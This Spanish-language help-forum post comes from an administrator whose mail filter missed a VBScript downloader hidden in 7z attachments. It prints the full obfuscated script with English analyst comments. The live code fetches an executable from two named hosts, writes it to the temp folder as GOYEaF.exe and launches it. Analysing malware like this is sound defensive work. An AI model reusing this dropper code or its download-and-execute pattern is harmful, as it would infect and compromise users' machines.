I need a solution
Hola, he detectado a través de Mail Security de Endpoint que este no analiza bien el contenido de los archivos comprimidos.
Dentro de mis filtros he creado una política de revisión de tal manera que todo correo entrante o saliente con un adjunto comprimido sea analizado; esta semana recibimos nuevos virus, pero están usando el compresor 7zip.
Dentro de este viene un .vbs
He aislado el código y estoy revisando su contenido y qué hace:
Necesito ayuda para poder detenerlo:
El código que trae es el siguiente:
Tuve que agregar esta extensión.
' Builds a 61x21 cost grid from tmap and hands it to a_star.
' NOTE(review): nothing in the visible script calls this function, and tmap,
' a_star and rollover are not defined here, so it looks like filler that pads
' the file around the download logic. Confirm against the full sample.
function ep_planetroute(route,move,start, target)
dim x,y,astarmap(60,20)
for x=0 to 60
for y=0 to 20
if move<tmap(x,y).walktru then astarmap(x,y)=1500
if tmap(x,y).onopen<>0 then astarmap(x,y)=0
if tmap(x,y).no=45 then astarmap(x,y)=1500
next
next
return a_star(route(),target,start,astarmap(),60,20,0,rollover)
end function
' Returns 1 only when both arguments equal 1, otherwise 0.
' The only visible caller is oandd, which is itself never called.
Function Andd ( Biel1 , Biel2 )
Andd = 0
If Biel1 = 1 then
If Biel2 = 1 then
Andd = 1
end if
end if
end function
' Returns nott(Andd(a, b)). nott is not defined in the visible script and
' oandd is never called, so this does not take part in the download logic.
function oandd ( Biel1 , Biel2 )
oandd = nott ( andd (biel1 , biel2 ) )
end function
' Global that later holds the full path of the file written to disk.
Dim gagagagadrierheal33 'As String
' Concatenates to ".responseBody"; Vrungel is not read again in the visible script.
Vrungel = ".responseB"+"ody"
' Copies the HTTP response bytes from the global request object into the
' global buffer gagagagadrierandIknowIT.
' The copy happens only when 2 < dry < 2232; the one visible call passes 13,
' so the range test does not filter anything there.
Function LabradorPS2(dry)
if dry > 2 AND 2232 > dry Then
gagagagadrierandIknowIT = gagagagadriercAfee.responseBody
end if
End Function
' First fragment of a header name. Later statements append "-", "A" and
' "gent", so the literal "User-Agent" never appears in the file.
gagagagadrierRH = "User"
' Later receives the value of the TEMP process environment variable.
Dim gagagagadrierLAKOPPC 'As String
'Dim RDFGO() 'As String
' Later holds the "Swing"-delimited string table.
Dim gagagagadrier2 'As String
' Only referenced from a commented-out CreateObject line.
Dim gagagagadrierGMAKO 'As Object
' Declared but never used in the visible script.
Dim TristateTrue
' Later bound to the HTTP request object.
Dim gagagagadriercAfee 'As Object
' Later bound to the ADODB stream used to write the file.
Dim SPCcontractorsR 'As Object
' Writes the contents of the global ADODB stream to the path held in
' gagagagadrierheal33. Option 2 (adSaveCreateOverWrite) replaces any
' existing file at that path.
Function LabradorPS()
SPCcontractorsR.Savetofile gagagagadrierheal33, 2
End Function
' Sends the request prepared on the global HTTP object.
' The parameter p is ignored.
Function gagagagadrierTeethk(p)
gagagagadriercAfee.Send
End Function
' Success flag: set to true once a download URL answers with status 200.
Dim gagagagadrierrepost
gagagagadrierrepost = false
' Receives the array produced by splitting the string table.
Dim RDFGO
' Later bound to the process environment collection.
Dim gagagagadrierKSKLAL 'As Object
' Creates a WScript.Shell object and stores it in the global
' gagagagadrierRombickom; GeometryDash uses it to launch the written file.
' The parameter p is ignored.
Function F3(p)
Set gagagagadrierRombickom = CreateObject("WScript.Shell")
End Function
' Later bound to a WScript.Shell instance used to read the environment.
Dim gagagagadrier1DASH1solo 'As Object
' String table, joined with "+" and delimited by the token "Swing" so that
' ProgIDs, method names, the file name and the URL scheme do not appear as
' whole strings. Splitting on "Swing" yields:
'   0 Microsoft.XMLHTTP   1 Adodb.streaM   2 shell.Application
'   3 Wscript.shell       4 Process        5 GeT
'   6 TemP                7 Type           8 open
'   9 write              10 responseBody  11 savetofile
'  12 \GOYEaF.exe        13 http:         14 //
' Static rules that match whole strings miss this; matching the fragments
' or the delimiter-heavy literal is more robust for this sample.
gagagagadrier2 = "Microsoft.XMLHTTPSwingAdodb.streaMSwingshell"+".ApplicationSwingWscript.shellSwingProcessSwingGeTSwingTem"+"PSwingTypeSwingopenSwingwriteSwingresponseBodySwingsavet"+"ofileSwing\GOYEaF.e"+"xeSwinghttp:Swing//"
' Later holds the full URL of the current download attempt.
Dim gagagagadrier4 'As String
' Launches the path stored in the global gagagagadrierheal33u through
' WScript.Shell.Run. Both parameters are ignored.
' The script never calls this by name: it is reached through the Darkness
' reference obtained with GetRef("GeometryDash"), which hides the call from
' a simple search for the function name.
Function GeometryDash(p,d)
gagagagadrierRombickom.Run(gagagagadrierheal33u)
End Function
' Splits the global string table gagagagadrier2 on the delimiter s500
' and returns the resulting array.
Function Razdel( s500 )
Razdel = Split(gagagagadrier2, s500)
End Function
' Main download stage: decodes the string table, creates the COM objects and
' tries each download URL until one answers with HTTP 200.
' Indicators visible in this block (defanged here, literal in the code):
'   luczko[.]pl/86hHYU6?   and   74jhdrommdtyis[.]net/af/86hHYU6
'   a fixed Firefox 54 User-Agent sent by the Windows script host
Dim sWholeVis 'As String
' Buffer for the downloaded response bytes.
Dim gagagagadrierandIknowIT 'As Variant
Dim dePetya 'As Integer
' "User" becomes "User-".
gagagagadrierRH = gagagagadrierRH&"-"
Dim iSlashPOS 'As Integer
Dim sDecimalVis 'As String
sWholeVis = "A"
' Two candidate download locations, stored without a scheme, separated by "^".
Lunchers = Split("luczko.pl/86hHYU6?^74jhdrommdtyis.net/af/86hHYU6", "^")
Dim MarketPlaceibility 'As String
Dim sNodeKey 'As String
Dim sParentKey 'As String
Dim MarketPlace 'As String
' Decode the string table by splitting on "Swing".
RDFGO = Razdel(""&"Swing")
Dim sTempVis 'As String
Dim iCount 'As Integer
Dim gagagagadrierRombickom
' Entry 1 is "Adodb.streaM"; zTempVis is not read again in the visible script.
zTempVis = RDFGO(1)
' Index of the "\GOYEaF.exe" entry in the table.
iSlashPOS = 12
'Set gagagagadrierGMAKO = CreateObject(RDFGO(8-6))
' Function reference used later to call GeometryDash indirectly.
Set Darkness = GetRef("GeometryDash")
Set SPCcontractorsR = CreateObject("Adodb.streaM")
' "http:" & "//" gives the URL scheme prefix.
MarketPlace = RDFGO(13) & RDFGO(14)
' "User-" & "A" & "gent" gives "User-Agent".
gagagagadrierRH = gagagagadrierRH&sWholeVis&"gent"
' Entry 3: Wscript.shell.
Set gagagagadrier1DASH1solo = CreateObject(RDFGO(3))
' Entry 0: Microsoft.XMLHTTP.
Set gagagagadriercAfee = CreateObject(RDFGO(0))
dePetya = 1
' Environment("Process"), then its "TemP" entry: the user's temp directory.
Set gagagagadrierKSKLAL = gagagagadrier1DASH1solo.Environment(RDFGO(1 + 3))
gagagagadrierLAKOPPC = gagagagadrierKSKLAL(RDFGO(6))
' File name component "\GOYEaF.exe".
sTempVis = RDFGO(iSlashPOS)
Dim i
'on error GoTo nextU
' on error resume next
ubnd = UBound(Lunchers)
' Try each location in order; stop at the first HTTP 200.
For i = 0 To ubnd Step 1
' Counter is incremented but never read in the visible script.
dePetya = 1 + dePetya
gagagagadrier4 = MarketPlace & Lunchers(i)
' Synchronous GET (third argument False) to the assembled http:// URL.
gagagagadriercAfee.Open RDFGO(5), gagagagadrier4, False
' Browser-like User-Agent so the request does not look like a script host.
gagagagadriercAfee.setRequestHeader gagagagadrierRH, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
' Errors from here on are suppressed, so an unreachable host does not stop the loop.
on error resume next
gagagagadrierTeethk ""
If gagagagadriercAfee.Status = 200 Then
gagagagadrierrepost = true
Exit For
End If
Next
' Restore default error handling.
on error goto 0
' Calls Send on the object passed in. Not called anywhere in the visible
' script; the request is sent through gagagagadrierTeethk instead.
Function gagagagadrierSEND(p)
p.Send
End Function
' Fills a 37-entry colour table and walks a 12x3 grid calling locate and
' set__color for each cell.
' NOTE(review): nothing in the visible script calls this function, and
' locate and set__color are not defined here, so it looks like filler placed
' between the download loop and the write-and-run stage. Confirm against the
' full sample.
function drawroulettetable()
dim x,y,z
dim coltable(36)
coltable(0)=10
coltable(1)=12
coltable(2)=15
coltable(3)=12
coltable(4)=15
coltable(5)=12
coltable(6)=15
coltable(7)=12
coltable(8)=15
coltable(9)=12
coltable(10)=15
coltable(11)=15
coltable(12)=12
coltable(13)=15
coltable(14)=12
coltable(15)=15
coltable(16)=12
coltable(17)=15
coltable(18)=12
coltable(19)=12
coltable(20)=15
coltable(21)=12
coltable(22)=15
coltable(23)=12
coltable(24)=15
coltable(25)=12
coltable(26)=15
coltable(27)=12
coltable(28)=15
coltable(29)=15
coltable(30)=12
coltable(31)=15
coltable(32)=12
coltable(33)=15
coltable(34)=12
coltable(35)=15
coltable(36)=12
z=0
for y=1 to 12
for x=1 to 3
z=z+1
locate y+2,x*3+45,0
if coltable(z)=12 then
set__color 12,2
else
set__color 0,2
end if
next
next
set__color 15,0
return 0
end function
' Write-and-run stage, entered only when the download flag was set.
' Observable chain for detection: the script host makes an outbound HTTP GET,
' an .exe is created in the temp directory, then that file is started by the
' same script host process. Blocking script attachments (.vbs) inside
' archives, including 7z, at the mail gateway stops the sample before here.
if gagagagadrierrepost Then
Dim Ratchet 'As String
' Target path: temp directory & "\GOYEaF.exe".
gagagagadrierheal33 = gagagagadrierLAKOPPC+ sTempVis
' Creates the WScript.Shell object used for the launch.
F3 ""
' Type 1 is adTypeBinary: the stream holds raw bytes.
SPCcontractorsR.Type = 1
SPCcontractorsR.Open
' Copies the response body into gagagagadrierandIknowIT (13 is inside the 2..2232 gate).
LabradorPS2 13
SPCcontractorsR.Write gagagagadrierandIknowIT
' Saves the stream to the target path, overwriting any existing file.
LabradorPS()
Dim HeWas,SheWas 'As Long
' Path read by GeometryDash.
gagagagadrierheal33u = gagagagadrierheal33
' Constant comparison: 939 < 2123 is always true, so the launch always runs.
HeWas = 2123
If 939 < HeWas Then
SheWas = ""
' Indirect call to GeometryDash, which runs the written file.
Darkness 4,SheWas
End If
end if
' Builds a "cvlc" command string when i = 1, or issues "kill <pid>" through
' SHELL when i = 2.
' NOTE(review): nothing in the visible script calls this function, and media,
' vlcArgs, pid and SHELL are not defined here, so it looks like trailing
' filler. cmdPipe is declared but unused. Confirm against the full sample.
Function hullPosix(ByVal i )
DIM cmdPipe
If(i = 1) Then
runCmd = "cvlc "& chr(34) & media & chr(34) & ""& vlcArgs & "&"
ElseIf (i = 2) Then
If (pid <> "NULL") Then
SHELL "kill "& pid
pid = "NULL"
End If
End If
End Function